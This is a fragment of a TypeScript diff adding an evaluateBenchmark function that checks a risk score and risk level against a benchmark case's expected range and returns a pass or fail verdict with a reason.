+ expectedLevel: string;
409
+ actualLevel: string;
410
+ expectedScoreRange: [number, number];
411
+ actualScore: number;
412
+ verdict: BenchmarkVerdict;
413
+ reason: string;
414
+ }
415
+
416
+ export function evaluateBenchmark(
417
+ bench: BenchmarkCase,
418
+ actualRiskLevel: string,
419
+ actualRiskScore: number,
420
+ ): BenchmarkResult {
421
+ const scoreInRange = actualRiskScore >= bench.expected.min_risk_score && actualRiskScore <= bench.expected.max_risk_score;
422
+
423
+ const levelMap: Record<string, number> = { LOW: 0, MEDIUM: 1, HIGH: 2, CRITICAL: 3 };
424
+ const expectedOrd = levelMap[bench.expected.risk_level] ?? 0;
425
+ const actualOrd = levelMap[actualRiskLevel] ?? 0;
426
+
427
+ const levelCorrect = bench.expected.risk_level === 'LOW'
428
+ ? actualOrd <= 1
429
+ : actualOrd >= expectedOrd - 1 && actualOrd <= expectedOrd + 1;
430
+
431
+ const passed = scoreInRange && levelCorrect;
432
+
433
+ let reason = '';
434
+ if (!scoreInRange) {
435
+ reason = `Score ${actualRiskScore} outside expected range [${bench.expected.min_risk_score}, ${bench.expected.max_risk_score}]`;
436
+ } else if (!levelCorrect) {
437
+ reason = `Level ${actualRiskLevel} does not match expected ${bench.expected.risk_level}`;
438
+ }
439
+
440
+ return {
441
+ caseId: bench.id,
442
+ category: bench.category,
443
+ expectedLevel: bench.expected.risk_level,
444
+ actualLevel: actualRiskLevel,
445
+ expectedScoreRange: [bench.expected.min_risk_score, bench.expected.max_risk_score],
446
+ actualScore: actualRiskScore,
447
+ verdict: passed ? 'PASS' : 'FAIL',
448
+ reason: passed ? 'Correctly classified' : reason,
449
+ };
450
+ }